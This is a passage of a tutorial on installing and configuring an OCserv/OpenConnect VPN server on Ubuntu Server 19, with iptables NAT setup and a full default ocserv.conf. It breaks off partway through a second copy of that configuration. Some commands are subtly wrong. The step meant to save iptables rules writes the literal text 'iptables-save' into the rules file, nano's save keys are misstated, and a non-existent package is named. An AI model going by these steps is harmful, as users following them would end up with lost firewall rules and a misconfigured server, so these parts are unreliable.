How to: Create/Configure/Setup OCserv/OpenConnect VPN server with Ubuntu Server 19 (both Quick ways & Tuning/Refining) [A simple yet comprehensive OCserv VPN Server setup Guide]

This can get you up and running quickly, to use OCserv/OpenConnect VPN in the long run, you will still need to do some work including security hardening like getting and configure proper SSL/TLS certificate, configure OCserv server routing table based on principle of least privilege (POLP), hardening Ubuntu Server ports/routing table with iptables or at least use UFW firewall to configure some rules, create different VPN credentials for different use/user with POLP in mind.

Before starting, we assume the Ubuntu Server 19 is newly installed and clean, with ufw disabled (Not a good idea to have ufw and iptables disabled on production servers).

If you have existing Ubuntu server running, you probably want to check what ports are used (Guide can be found here: How to: Check/View ports in use/listening ports locally on Linux/Debian/Ubuntu/Kali Linux/CentOS/Fedora/RHEL etc.) If port 443 is used (default port for OCserv) we will need to change ports for OCserv, to check current if ufw is enabled or not (sudo ufw status), to check existing iptables rules (How to: List all rules from iptables (How to: List all iptables rules)).

Table of contents

  1. Create/Configure/Setup OCserv/OpenConnect VPN server (Basics to get it running quickly)
  2. Get the OCserv/OpenConnect VPN Server and Clients running
  3. Get the OCserv/OpenConnect VPN Server connection information
  4. Extend

1 Create/Configure/Setup OCserv/OpenConnect VPN server (Basics to get it running quickly)

1.1 Prepare the server

1.1.1 Assign static IP address for the server if necessary (Unless just testing)

(For production mode, we have to assign static IP address for the server or we can lose connection easily)

Follow this guide to configure static IP address for Ubuntu Server 19: How to: Set/Configure Static IP Address/DHCP for Ubuntu Server/Desktop 18.04/19.04/19.10 via Terminal using netplan

1.1.2 Enable packet forwarding for Ubuntu Server 19

1.1.2.1 Make a backup of “/etc/sysctl.conf”

sudo cp /etc/sysctl.conf /etc/sysctl.conf_bk
Backup sysctl.conf
Backup sysctl.conf

1.1.2.2 Modify “/etc/sysctl.conf” to Enable packet forwarding

We can use nano or other editor to add “net.ipv4.ip_forward=1” to “/etc/sysctl.conf” file or use one command

Method 1 – Using Nano

# Use nano to edit the file
sudo nano /etc/sysctl.conf
 
# Add net.ipv4.ip_forward=1 at the bottom of the tile
net.ipv4.ip_forward=1
 
# Save and Exit the nano editor
Ctrl + W, Y, Enter
 
# Apply the changes
sudo sysctl -p

Method 2 – Using one command

# Append the net.ipv4.ip_forward=1 to bottom of the "/etc/sysctl.conf" file
sudo bash -c 'echo "net.ipv4.ip_forward=1" >> /etc/sysctl.conf'
 
# Apply the change
sudo sysctl -p
Append changes, apply changes
Append changes, apply changes

1.1.3 Enable NAT/MASQUERADE with iptables

1.1.3.1 Check your NIC name on Ubuntu

(In this example it is ens33, yours can be different)

sudo ip a
ip a command output
ip a command output

1.1.3.2 Create NAT rule with iptables (Here we have ens33, yours can be different) (Type exactly same command, beware of upper case and lower case)

sudo iptables -t nat -A POSTROUTING -o ens33 -j MASQUERADE
# Check if the rules was added
sudo iptables -t nat -L
Check if the rules was added, sudo iptables -t nat -L
Check if the rules was added, sudo iptables -t nat -L

1.1.3.3 Make the iptables rule persistent

(Without this step, iptables rules will be lost after Ubuntu Server reboot)

# Install necessary tools
sudo apt install -y iptables-save iptables-persistent
 
# Answer Yes when asked
 
# Now the current iptables rules are saved, they will be restored after server reboot

(More on making iptables rules persistent: How to: Make iptables rules persistent between reboots on Debian/Ubuntu 18, 19)

If we have made new changes, we have to use following command to save the current iptables rules again

sudo bash -c 'echo "iptables-save" > /etc/iptables/rules.v4'

1.1.4 ufw firewall

1.1.4.1 ufw should be disabled by default, if not, use following command to check the status and disable it if necessary (For production use, we should carefully configure ufw rather than disable it)

# Check ufw firewall status
sudo ufw status
 
# Output
Status: inactive

If it’s not disabled, use following command to disable it

# Disable ufw firewall
sudo ufw disable

1.2 Install OCserv/OpenConnect

sudo apt update
sudo apt install -y ocserv
 
# If you are having problem running the aove command, try to update the system first by using following commands then run the above command again
sudo apt update
sudo apt upgrade

1.3 Configure OCserv/OpenConnect

1.3.1 Backup default OCserv/OpenConnect configuration file

sudo cp /etc/ocserv/ocserv.conf /etc/ocserv/ocserv.conf_bk

1.3.2 Bare minimum Configuration for OCserv/OpenConnect to run, accept connections and route all traffic

1.3.2.1 Open and edit the configuration file “/etc/ocserv/ocserv.conf”

sudo nano /etc/ocserv/ocserv.conf
1.3.2.2 The content of default OCserv/OpenConnect configuration “/etc/ocserv/ocserv.conf” file
# User authentication method. Could be set multiple times and in 
# that case all should succeed. To enable multiple methods use
# multiple auth directives. Available options: certificate, 
# plain, pam, radius, gssapi.
#
# Note that authentication methods cannot be changed with reload.
# certificate:
#  This indicates that all connecting users must present a certificate.
#
# pam[gid-min=1000]:
#  This enabled PAM authentication of the user. The gid-min option is used 
# by auto-select-group option, in order to select the minimum valid group ID.
#
# plain[passwd=/etc/ocserv/ocpasswd,otp=/etc/ocserv/users.otp]
#  The plain option requires specifying a password file which contains
# entries of the following format.
# "username:groupname1,groupname2:encoded-password"
# One entry must be listed per line, and 'ocpasswd' should be used
# to generate password entries. The 'otp' suboption allows to specify
# an oath password file to be used for one time passwords; the format of
# the file is described in https://code.google.com/p/mod-authn-otp/wiki/UsersFile
#
# radius[config=/etc/radiusclient/radiusclient.conf,groupconfig=true,nas-identifier=name]:
#  The radius option requires specifying freeradius-client configuration
# file. If the groupconfig option is set, then config-per-user/group will be overriden,
# and all configuration will be read from radius. That also includes the
# Acct-Interim-Interval, and Session-Timeout values.
#
# See doc/README-radius.md for the supported radius configuration atributes.
#
# gssapi[keytab=/etc/key.tab,require-local-user-map=true,tgt-freshness-time=900]
#  The gssapi option allows to use authentication methods supported by GSSAPI,
# such as Kerberos tickets with ocserv. It should be best used as an alternative
# to PAM (i.e., have pam in auth and gssapi in enable-auth), to allow users with
# tickets and without tickets to login. The default value for require-local-user-map
# is true. The 'tgt-freshness-time' if set, it would require the TGT tickets presented
# to have been issued within the provided number of seconds. That option is used to
# restrict logins even if the KDC provides long time TGT tickets.
#auth = "pam"
auth = "pam[gid-min=1000]"
#auth = "plain[passwd=./sample.passwd,otp=./sample.otp]"
#auth = "plain[passwd=./sample.passwd]"
#auth = "certificate"
#auth = "radius[config=/etc/radiusclient/radiusclient.conf,groupconfig=true]"
# Specify alternative authentication methods that are sufficient
# for authentication. That is, if set, any of the methods enabled
# will be sufficient to login.
#enable-auth = "certificate"
#enable-auth = "gssapi"
#enable-auth = "gssapi[keytab=/etc/key.tab,require-local-user-map=true,tgt-freshness-time=900]"
# Accounting methods available:
# radius: can be combined with any authentication method, it provides
#      radius accounting to available users (see also stats-report-time).
#
# pam: can be combined with any authentication method, it provides
#      a validation of the connecting user's name using PAM. It is
#      superfluous to use this method when authentication is already
#      PAM.
#
# Only one accounting method can be specified.
#acct = "radius[config=/etc/radiusclient/radiusclient.conf]"
# Use listen-host to limit to specific IPs or to the IPs of a provided 
# hostname.
#listen-host = [IP|HOSTNAME]
# When the server has a dynamic DNS address (that may change),
# should set that to true to ask the client to resolve again on
# reconnects.
#listen-host-is-dyndns = true
# TCP and UDP port number
# Note: These options are controlled by ocserv.socket if socket-activated
# version of systemd configuration is used
tcp-port = 443
udp-port = 443
# Accept connections using a socket file. It accepts HTTP
# connections (i.e., without SSL/TLS unlike its TCP counterpart),
# and uses it as the primary channel. That option cannot be
# combined with certificate authentication.
#listen-clear-file = /run/ocserv-conn.socket
# The user the worker processes will be run as. It should be
# unique (no other services run as this user).
run-as-user = nobody
run-as-group = daemon
# socket file used for IPC with occtl. You only need to set that,
# if you use more than a single servers.
#occtl-socket-file = /run/occtl.socket
# socket file used for server IPC (worker-main), will be appended with .PID
# It must be accessible within the chroot environment (if any), so it is best
# specified relatively to the chroot directory.
socket-file = /run/ocserv.socket
# The default server directory. Does not require any devices present.
#chroot-dir = /path/to/chroot
# The key and the certificates of the server
# The key may be a file, or any URL supported by GnuTLS (e.g., 
# tpmkey:uuid=xxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx;storage=user
# or pkcs11:object=my-vpn-key;object-type=private)
#
# The server-cert file may contain a single certificate, or
# a sorted certificate chain.
#
# There may be multiple server-cert and server-key directives,
# but each key should correspond to the preceding certificate.
server-cert = /etc/ssl/certs/ssl-cert-snakeoil.pem
server-key = /etc/ssl/private/ssl-cert-snakeoil.key
# Diffie-Hellman parameters. Only needed if you require support
# for the DHE ciphersuites (by default this server supports ECDHE).
# Can be generated using:
# certtool --generate-dh-params --outfile /path/to/dh.pem
#dh-params = /path/to/dh.pem
# In case PKCS #11, TPM or encrypted keys are used the PINs should be available
# in files. The srk-pin-file is applicable to TPM keys only, and is the 
# storage root key.
#pin-file = /path/to/pin.txt
#srk-pin-file = /path/to/srkpin.txt
# The password or PIN needed to unlock the key in server-key file.
# Only needed if the file is encrypted or a PKCS #11 object. This
# is an alternative method to pin-file.
#key-pin = 1234
# The SRK PIN for TPM.
# This is an alternative method to srk-pin-file.
#srk-pin = 1234
# The Certificate Authority that will be used to verify
# client certificates (public keys) if certificate authentication
# is set.
ca-cert = /etc/ssl/certs/ssl-cert-snakeoil.pem
### All configuration options below this line are reloaded on a SIGHUP.
### The options above, will remain unchanged. Note however, that the 
### server-cert, server-key, dh-params and ca-cert options will be reloaded
### if the provided file changes, on server reload. That allows certificate
### rotation, but requires the server key to remain the same for seamless
### operation. If the server key changes on reload, there may be connection
### failures during the reloading time.
# Whether to enable seccomp/Linux namespaces worker isolation. That restricts the number of 
# system calls allowed to a worker process, in order to reduce damage from a
# bug in the worker process. It is available on Linux systems at a performance cost.
# The performance cost is roughly 2% overhead at transfer time (tested on a Linux 3.17.8).
# Note however, that process isolation is restricted to the specific libc versions
# the isolation was tested at. If you get random failures on worker processes, try
# disabling that option and report the failures you, along with system and debugging
# information at: https://gitlab.com/ocserv/ocserv/issues
isolate-workers = true
# A banner to be displayed on clients
#banner = "Welcome"
# Limit the number of clients. Unset or set to zero for unlimited.
#max-clients = 1024
max-clients = 128
# Limit the number of identical clients (i.e., users connecting 
# multiple times). Unset or set to zero for unlimited.
max-same-clients = 2
# When the server receives connections from a proxy, like haproxy
# which supports the proxy protocol, set this to obtain the correct
# client addresses. The proxy protocol (v2) would then be expected in
# the TCP or UNIX socket (not the UDP one).
#listen-proxy-proto = true
# Limit the number of client connections to one every X milliseconds 
# (X is the provided value). Set to zero for no limit.
#rate-limit-ms = 100
# Stats report time. The number of seconds after which each
# worker process will report its usage statistics (number of
# bytes transferred etc). This is useful when accounting like
# radius is in use.
#stats-report-time = 360
# Stats reset time. The period of time statistics kept by main/sec-mod
# processes will be reset. These are the statistics shown by cmd
# 'occtl show stats'. For daily: 86400, weekly: 604800
# This is unrelated to stats-report-time.
server-stats-reset-time = 604800
# Keepalive in seconds
keepalive = 300
# Dead peer detection in seconds.
# Note that when the client is behind a NAT this value
# needs to be short enough to prevent the NAT disassociating
# his UDP session from the port number. Otherwise the client
# could have his UDP connection stalled, for several minutes.
dpd = 60
# Dead peer detection for mobile clients. That needs to
# be higher to prevent such clients being awaken too 
# often by the DPD messages, and save battery.
# The mobile clients are distinguished from the header
# 'X-AnyConnect-Identifier-Platform'.
mobile-dpd = 300
# If using DTLS, and no UDP traffic is received for this
# many seconds, attempt to send future traffic over the TCP
# connection instead, in an attempt to wake up the client
# in the case that there is a NAT and the UDP translation
# was deleted. If this is unset, do not attempt to use this
# recovery mechanism.
switch-to-tcp-timeout = 30
# MTU discovery (DPD must be enabled)
try-mtu-discovery = false
# If you have a certificate from a CA that provides an OCSP
# service you may provide a fresh OCSP status response within
# the TLS handshake. That will prevent the client from connecting
# independently on the OCSP server.
# You can update this response periodically using:
# ocsptool --ask --load-cert=your_cert --load-issuer=your_ca --outfile response
# Make sure that you replace the following file in an atomic way.
#ocsp-response = /path/to/ocsp.der
# The object identifier that will be used to read the user ID in the client 
# certificate. The object identifier should be part of the certificate's DN
# Useful OIDs are: 
#  CN = 2.5.4.3, UID = 0.9.2342.19200300.100.1.1
cert-user-oid = 0.9.2342.19200300.100.1.1
# The object identifier that will be used to read the user group in the 
# client certificate. The object identifier should be part of the certificate's
# DN. If the user may belong to multiple groups, then use multiple such fields
# in the certificate's DN. Useful OIDs are: 
#  OU (organizational unit) = 2.5.4.11 
#cert-group-oid = 2.5.4.11
# The revocation list of the certificates issued by the 'ca-cert' above.
# See the manual to generate an empty CRL initially. The CRL will be reloaded
# periodically when ocserv detects a change in the file. To force a reload use
# SIGHUP.
#crl = /path/to/crl.pem
# Uncomment this to enable compression negotiation (LZS, LZ4).
compression = true
# Set the minimum size under which a packet will not be compressed.
# That is to allow low-latency for VoIP packets. The default size
# is 256 bytes. Modify it if the clients typically use compression
# as well of VoIP with codecs that exceed the default value.
no-compress-limit = 256
# GnuTLS priority string; note that SSL 3.0 is disabled by default
# as there are no openconnect (and possibly anyconnect clients) using
# that protocol. The string below does not enforce perfect forward
# secrecy, in order to be compatible with legacy clients.
#
# Note that the most performant ciphersuites are the moment are the ones
# involving AES-GCM. These are very fast in x86 and x86-64 hardware, and
# in addition require no padding, thus taking full advantage of the MTU.
# For that to be taken advantage of, the openconnect client must be
# used, and the server must be compiled against GnuTLS 3.2.7 or later.
# Use "gnutls-cli --benchmark-tls-ciphers", to see the performance
# difference with AES_128_CBC_SHA1 (the default for anyconnect clients)
# in your system.
# More combinations in priority strings are available, check
# http://gnutls.org/manual/html_node/Priority-Strings.html
# E.g., the string below enforces perfect forward secrecy (PFS) 
# on the main channel.
tls-priorities = "NORMAL:%SERVER_PRECEDENCE:%COMPAT:-RSA:-VERS-SSL3.0:-ARCFOUR-128"
# That option requires the established DTLS channel to use the same
# cipher as the primary TLS channel. This cannot be combined with
# listen-clear-file since the ciphersuite information is not available
# in that configuration. Note also, that this option implies that
# dtls-legacy option is false; this option cannot be enforced
# in the legacy/compat protocol.
#match-tls-dtls-ciphers = true
# The time (in seconds) that a client is allowed to stay connected prior
# to authentication
auth-timeout = 240
# The time (in seconds) that a client is allowed to stay idle (no traffic)
# before being disconnected. Unset to disable.
idle-timeout = 1200
# The time (in seconds) that a mobile client is allowed to stay idle (no
# traffic) before being disconnected. Unset to disable.
mobile-idle-timeout = 1800
# The time (in seconds) that a client is not allowed to reconnect after 
# a failed authentication attempt.
min-reauth-time = 3
# Banning clients in ocserv works with a point system. IP addresses
# that get a score over that configured number are banned for
# min-reauth-time seconds. By default a wrong password attempt is 10 points,
# a KKDCP POST is 1 point, and a connection is 1 point. Note that
# due to difference processes being involved the count of points
# will not be real-time precise.
#
# Score banning cannot be reliably used when receiving proxied connections
# locally from an HTTP server (i.e., when listen-clear-file is used).
#
# Set to zero to disable.
max-ban-score = 50
# The time (in seconds) that all score kept for a client is reset.
ban-reset-time = 300
# In case you'd like to change the default points.
#ban-points-wrong-password = 10
#ban-points-connection = 1
#ban-points-kkdcp = 1
# Cookie timeout (in seconds)
# Once a client is authenticated he's provided a cookie with
# which he can reconnect. That cookie will be invalidated if not
# used within this timeout value. This cookie remains valid, during
# the user's connected time, and after user disconnection it
# remains active for this amount of time. That setting should allow a
# reasonable amount of time for roaming between different networks.
cookie-timeout = 300
# If this is enabled (not recommended) the cookies will stay
# valid even after a user manually disconnects, and until they
# expire. This may improve roaming with some broken clients.
#persistent-cookies = true
# Whether roaming is allowed, i.e., if true a cookie is
# restricted to a single IP address and cannot be re-used
# from a different IP.
deny-roaming = false
# ReKey time (in seconds)
# ocserv will ask the client to refresh keys periodically once
# this amount of seconds is elapsed. Set to zero to disable (note
# that, some clients fail if rekey is disabled).
rekey-time = 172800
# ReKey method
# Valid options: ssl, new-tunnel
#  ssl: Will perform an efficient rehandshake on the channel allowing
#       a seamless connection during rekey.
#  new-tunnel: Will instruct the client to discard and re-establish the channel.
#       Use this option only if the connecting clients have issues with the ssl
#       option.
rekey-method = ssl
# Script to call when a client connects and obtains an IP.
# The following parameters are passed on the environment.
# REASON, USERNAME, GROUPNAME, DEVICE, IP_REAL (the real IP of the client),
# IP_REAL_LOCAL (the local interface IP the client connected), IP_LOCAL
# (the local IP in the P-t-P connection), IP_REMOTE (the VPN IP of the client),
# IPV6_LOCAL (the IPv6 local address if there are both IPv4 and IPv6
# assigned), IPV6_REMOTE (the IPv6 remote address), IPV6_PREFIX, and
# ID (a unique numeric ID); REASON may be "connect" or "disconnect".
# In addition the following variables OCSERV_ROUTES (the applied routes for this
# client), OCSERV_NO_ROUTES, OCSERV_DNS (the DNS servers for this client),
# will contain a space separated list of routes or DNS servers. A version
# of these variables with the 4 or 6 suffix will contain only the IPv4 or
# IPv6 values.
# The disconnect script will receive the additional values: STATS_BYTES_IN,
# STATS_BYTES_OUT, STATS_DURATION that contain a 64-bit counter of the bytes 
# output from the tun device, and the duration of the session in seconds.
#connect-script = /usr/bin/myscript
#disconnect-script = /usr/bin/myscript
# UTMP
# Register the connected clients to utmp. This will allow viewing
# the connected clients using the command 'who'.
#use-utmp = true
# Whether to enable support for the occtl tool (i.e., either through D-BUS,
# or via a unix socket).
use-occtl = true
# PID file. It can be overriden in the command line.
pid-file = /run/ocserv.pid
# Set the protocol-defined priority (SO_PRIORITY) for packets to
# be sent. That is a number from 0 to 6 with 0 being the lowest
# priority. Alternatively this can be used to set the IP Type-
# Of-Service, by setting it to a hexadecimal number (e.g., 0x20).
# This can be set per user/group or globally.
#net-priority = 3
# Set the VPN worker process into a specific cgroup. This is Linux
# specific and can be set per user/group or globally.
#cgroup = "cpuset,cpu:test"
#
# Network settings
#
# The name to use for the tun device
device = vpns
# Whether the generated IPs will be predictable, i.e., IP stays the
# same for the same user when possible.
predictable-ips = true
# The default domain to be advertised
default-domain = example.com
# The pool of addresses that leases will be given from. If the leases
# are given via Radius, or via the explicit-ip? per-user config option then 
# these network values should contain a network with at least a single
# address that will remain under the full control of ocserv (that is
# to be able to assign the local part of the tun device address).
# Note that, you could use addresses from a subnet of your LAN network if you
# enable proxy arp in the LAN interface (see http://infradead.org/ocserv/recipes-ocserv-pseudo-bridge.html);
# in that case it is recommended to set ping-leases to true.
ipv4-network = 192.168.1.0
ipv4-netmask = 255.255.255.0
# An alternative way of specifying the network:
#ipv4-network = 192.168.1.0/24
# The IPv6 subnet that leases will be given from.
#ipv6-network = fda9:4efe:7e3b:03ea::/48 
# Specify the size of the network to provide to clients. It is
# generally recommended to provide clients with a /64 network in
# IPv6, but any subnet may be specified. To provide clients only
# with a single IP use the prefix 128.
#ipv6-subnet-prefix = 128
#ipv6-subnet-prefix = 64
# Whether to tunnel all DNS queries via the VPN. This is the default
# when a default route is set.
#tunnel-all-dns = true
# The advertized DNS server. Use multiple lines for
# multiple servers.
# dns = fc00::4be0
dns = 8.8.8.8
dns = 8.8.4.4
# The NBNS server (if any)
#nbns = 192.168.1.3
# The domains over which the provided DNS should be used. Use
# multiple lines for multiple domains.
#split-dns = example.com
# Prior to leasing any IP from the pool ping it to verify that
# it is not in use by another (unrelated to this server) host.
# Only set to true, if there can be occupied addresses in the
# IP range for leases.
ping-leases = false
# Use this option to set a link MTU value to the incoming
# connections. Unset to use the default MTU of the TUN device.
# Note that the MTU is negotiated using the value set and the
# value sent by the peer.
#mtu = 1420
# Unset to enable bandwidth restrictions (in bytes/sec). The
# setting here is global, but can also be set per user or per group.
#rx-data-per-sec = 40000
#tx-data-per-sec = 40000
# The number of packets (of MTU size) that are available in
# the output buffer. The default is low to improve latency.
# Setting it higher will improve throughput.
#output-buffer = 10
# Routes to be forwarded to the client. If you need the
# client to forward routes to the server, you may use the 
# config-per-user/group or even connect and disconnect scripts.
#
# To set the server as the default gateway for the client just
# comment out all routes from the server, or use the special keyword
# 'default'.
route = 10.0.0.0/8
route = 172.16.0.0/12
route = 192.168.0.0/16
#route = fd00::/8
#route = default
# Subsets of the routes above that will not be routed by
# the server.
#no-route = 192.168.5.0/255.255.255.0
# Note the that following two firewalling options currently are available
# in Linux systems with iptables software. 
# If set, the script /usr/bin/ocserv-fw will be called to restrict
# the user to its allowed routes and prevent him from accessing
# any other routes. In case of defaultroute, the no-routes are restricted.
# All the routes applied by ocserv can be reverted using /usr/bin/ocserv-fw
# --removeall. This option can be set globally or in the per-user configuration.
#restrict-user-to-routes = true
# This option implies restrict-user-to-routes set to true. If set, the
# script /usr/bin/ocserv-fw will be called to restrict the user to
# access specific ports in the network. This option can be set globally
# or in the per-user configuration.
#restrict-user-to-ports = "tcp(443), tcp(80), udp(443), sctp(99), tcp(583), icmp(), icmpv6()"
# You could also use negation, i.e., block the user from accessing these ports only.
#restrict-user-to-ports = "!(tcp(443), tcp(80))"
# When set to true, all client's iroutes are made visible to all
# connecting clients except for the ones offering them. This option
# only makes sense if config-per-user is set.
#expose-iroutes = true
# Groups that a client is allowed to select from.
# A client may belong in multiple groups, and in certain use-cases
# it is needed to switch between them. For these cases the client can
# select prior to authentication. Add multiple entries for multiple groups.
# The group may be followed by a user-friendly name in brackets.
#select-group = group1
#select-group = group2[My special group]
# The name of the (virtual) group that if selected it would assign the user
# to its default group.
#default-select-group = DEFAULT
# Instead of specifying manually all the allowed groups, you may instruct
# ocserv to scan all available groups and include the full list.
#auto-select-group = true
# Configuration files that will be applied per user connection or
# per group. Each file name on these directories must match the username
# or the groupname.
# The options allowed in the configuration files are dns, nbns,
#  ipv?-network, ipv4-netmask, rx/tx-per-sec, iroute, route, no-route,
#  explicit-ipv4, explicit-ipv6, net-priority, deny-roaming, no-udp, 
#  keepalive, dpd, mobile-dpd, max-same-clients, tunnel-all-dns,
#  restrict-user-to-routes, user-profile, cgroup, stats-report-time,
#  mtu, idle-timeout, mobile-idle-timeout, restrict-user-to-ports,
#  and session-timeout.
#
# Note that the 'iroute' option allows to add routes on the server
# based on a user or group. The syntax depends on the input accepted
# by the commands route-add-cmd and route-del-cmd (see below). The no-udp
# is a boolean option (e.g., no-udp = true), and will prevent a UDP session
# for that specific user or group. The hostname option will set a
# hostname to override any proposed by the user. Note also, that, any 
# routes, no-routes, DNS or NBNS servers present will overwrite the global ones.
#config-per-user = /etc/ocserv/config-per-user/
#config-per-group = /etc/ocserv/config-per-group/
# When config-per-xxx is specified and there is no group or user that
# matches, then utilize the following configuration.
#default-user-config = /etc/ocserv/defaults/user.conf
#default-group-config = /etc/ocserv/defaults/group.conf
# The system command to use to setup a route. %{R} will be replaced with the
# route/mask, %{RI} with the route in CIDR format, and %{D} with the (tun) device.
#
# The following example is from linux systems. %{R} should be something
# like 192.168.2.0/255.255.255.0 and %{RI} 192.168.2.0/24 (the argument of iroute).
#route-add-cmd = "ip route add %{R} dev %{D}"
#route-del-cmd = "ip route delete %{R} dev %{D}"
# This option allows to forward a proxy. The special keywords '%{U}'
# and '%{G}', if present will be replaced by the username and group name.
#proxy-url = http://example.com/
#proxy-url = http://example.com/%{U}/
# This option allows you to specify a URL location where a client can
# post using MS-KKDCP, and the message will be forwarded to the provided
# KDC server. That is a translation URL between HTTP and Kerberos.
# In MIT kerberos you'll need to add in realms:
#   EXAMPLE.COM = {
#     kdc = https://ocserv.example.com/KdcProxy
#     http_anchors = FILE:/etc/ocserv-ca.pem
#   }
# In some distributions the krb5-k5tls plugin of kinit is required.
#
# The following option is available in ocserv, when compiled with GSSAPI support. 
#kkdcp = "SERVER-PATH KERBEROS-REALM [email protected]:PORT"
#kkdcp = "/KdcProxy KERBEROS.REALM [email protected]:88"
#kkdcp = "/KdcProxy KERBEROS.REALM [email protected]:88"
#kkdcp = "/KdcProxy KERBEROS.REALM [email protected][::1]:88"
#
# The following options are for (experimental) AnyConnect client 
# compatibility. 
# This option will enable the pre-draft-DTLS version of DTLS, and
# will not require clients to present their certificate on every TLS
# connection. It must be set to true to support legacy CISCO clients
# and openconnect clients < 7.08. When set to true, it implies dtls-legacy = true.
cisco-client-compat = true
# This option allows to disable the DTLS-PSK negotiation (enabled by default).
# The DTLS-PSK negotiation was introduced in ocserv 0.11.5 to deprecate
# the pre-draft-DTLS negotiation inherited from AnyConnect. It allows the
# DTLS channel to negotiate its ciphers and the DTLS protocol version.
#dtls-psk = false
# This option allows to disable the legacy DTLS negotiation (enabled by default,
# but that may change in the future).
# The legacy DTLS uses a pre-draft version of the DTLS protocol and was
# from AnyConnect protocol. It has several limitations, that are addressed
# by the dtls-psk protocol supported by openconnect 7.08+.
dtls-legacy = true
# Client profile xml. A sample file exists in doc/profile.xml.
# It is required by some of the CISCO clients.
# This file must be accessible from inside the worker's chroot. 
# Note that enabling this option is not recommended as it will allow
# the worker processes to open arbitrary files (when isolate-workers is
# set to true).
#user-profile = /path/to/file.xml
#Advanced options
# Option to allow sending arbitrary custom headers to the client after
# authentication and prior to VPN tunnel establishment. You shouldn't
# need to use this option normally; if you do and you think that
# this may help others, please send your settings and reason to
# the openconnect mailing list. The special keywords '%{U}'
# and '%{G}', if present will be replaced by the username and group name.
#custom-header = "X-My-Header: hi there"
# An example virtual host with different authentication methods serviced
# # by this server.
#
# [vhost:www.example.com]
# auth = "certificate"
#
# ca-cert = ../tests/certs/ca.pem
#
# # The certificate set here must include a 'dns_name' corresponding to
# # the virtual host name.
#
# server-cert = ../tests/certs/server-cert-secp521r1.pem
# server-key = ../tests/certs/server-key-secp521r1.pem
#
# ipv4-network = 192.168.2.0
# ipv4-netmask = 255.255.255.0
#
# cert-user-oid = 0.9.2342.19200300.100.1.1
#

1.3.2.3 Modification & The content of OCserv/OpenConnect configuration “/etc/ocserv/ocserv.conf” file after modification

Add # before following lines

route = 10.0.0.0/8
route = 172.16.0.0/12
route = 192.168.0.0/16

Remove # in front of

#route = default

(We can add “no-route” to protect our server LAN network “no-route = 192.168.247.0/255.255.255.0”, thus use the VPN server only for proxy internet traffic.)

no-route = 192.168.5.0/255.255.255.0

Modify following line if necessary (IPv4 network will be used for VPN clients)

ipv4-network = 192.168.1.0

Here we change it to

ipv4-network = 192.168.101.0

Modify DNS server if necessary (You can add other DNS servers or replace them)

dns = 8.8.8.8
dns = 8.8.4.4

Use Ctrl + W, Y, Enter to Exit and save the modification

1.3.2.4 Configuration file after modification
# User authentication method. Could be set multiple times and in 
# that case all should succeed. To enable multiple methods use
# multiple auth directives. Available options: certificate, 
# plain, pam, radius, gssapi.
#
# Note that authentication methods cannot be changed with reload.
# certificate:
#  This indicates that all connecting users must present a certificate.
#
# pam[gid-min=1000]:
#  This enabled PAM authentication of the user. The gid-min option is used 
# by auto-select-group option, in order to select the minimum valid group ID.
#
# plain[passwd=/etc/ocserv/ocpasswd,otp=/etc/ocserv/users.otp]
#  The plain option requires specifying a password file which contains
# entries of the following format.
# "username:groupname1,groupname2:encoded-password"
# One entry must be listed per line, and 'ocpasswd' should be used
# to generate password entries. The 'otp' suboption allows to specify
# an oath password file to be used for one time passwords; the format of
# the file is described in https://code.google.com/p/mod-authn-otp/wiki/UsersFile
#
# radius[config=/etc/radiusclient/radiusclient.conf,groupconfig=true,nas-identifier=name]:
#  The radius option requires specifying freeradius-client configuration
# file. If the groupconfig option is set, then config-per-user/group will be overriden,
# and all configuration will be read from radius. That also includes the
# Acct-Interim-Interval, and Session-Timeout values.
#
# See doc/README-radius.md for the supported radius configuration atributes.
#
# gssapi[keytab=/etc/key.tab,require-local-user-map=true,tgt-freshness-time=900]
#  The gssapi option allows to use authentication methods supported by GSSAPI,
# such as Kerberos tickets with ocserv. It should be best used as an alternative
# to PAM (i.e., have pam in auth and gssapi in enable-auth), to allow users with
# tickets and without tickets to login. The default value for require-local-user-map
# is true. The 'tgt-freshness-time' if set, it would require the TGT tickets presented
# to have been issued within the provided number of seconds. That option is used to
# restrict logins even if the KDC provides long time TGT tickets.
#auth = "pam"
auth = "pam[gid-min=1000]"
#auth = "plain[passwd=./sample.passwd,otp=./sample.otp]"
#auth = "plain[passwd=./sample.passwd]"
#auth = "certificate"
#auth = "radius[config=/etc/radiusclient/radiusclient.conf,groupconfig=true]"
# Specify alternative authentication methods that are sufficient
# for authentication. That is, if set, any of the methods enabled
# will be sufficient to login.
#enable-auth = "certificate"
#enable-auth = "gssapi"
#enable-auth = "gssapi[keytab=/etc/key.tab,require-local-user-map=true,tgt-freshness-time=900]"
# Accounting methods available:
# radius: can be combined with any authentication method, it provides
#      radius accounting to available users (see also stats-report-time).
#
# pam: can be combined with any authentication method, it provides
#      a validation of the connecting user's name using PAM. It is
#      superfluous to use this method when authentication is already
#      PAM.
#
# Only one accounting method can be specified.
#acct = "radius[config=/etc/radiusclient/radiusclient.conf]"
# Use listen-host to limit to specific IPs or to the IPs of a provided 
# hostname.
#listen-host = [IP|HOSTNAME]
# When the server has a dynamic DNS address (that may change),
# should set that to true to ask the client to resolve again on
# reconnects.
#listen-host-is-dyndns = true
# TCP and UDP port number
# Note: These options are controlled by ocserv.socket if socket-activated
# version of systemd configuration is used
tcp-port = 443
udp-port = 443
# Accept connections using a socket file. It accepts HTTP
# connections (i.e., without SSL/TLS unlike its TCP counterpart),
# and uses it as the primary channel. That option cannot be
# combined with certificate authentication.
#listen-clear-file = /run/ocserv-conn.socket
# The user the worker processes will be run as. It should be
# unique (no other services run as this user).
run-as-user = nobody
run-as-group = daemon
# socket file used for IPC with occtl. You only need to set that,
# if you use more than a single servers.
#occtl-socket-file = /run/occtl.socket
# socket file used for server IPC (worker-main), will be appended with .PID
# It must be accessible within the chroot environment (if any), so it is best
# specified relatively to the chroot directory.
socket-file = /run/ocserv.socket
# The default server directory. Does not require any devices present.
#chroot-dir = /path/to/chroot
# The key and the certificates of the server
# The key may be a file, or any URL supported by GnuTLS (e.g., 
# tpmkey:uuid=xxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx;storage=user
# or pkcs11:object=my-vpn-key;object-type=private)
#
# The server-cert file may contain a single certificate, or
# a sorted certificate chain.
#
# There may be multiple server-cert and server-key directives,
# but each key should correspond to the preceding certificate.
server-cert = /etc/ssl/certs/ssl-cert-snakeoil.pem
server-key = /etc/ssl/private/ssl-cert-snakeoil.key
# Diffie-Hellman parameters. Only needed if you require support
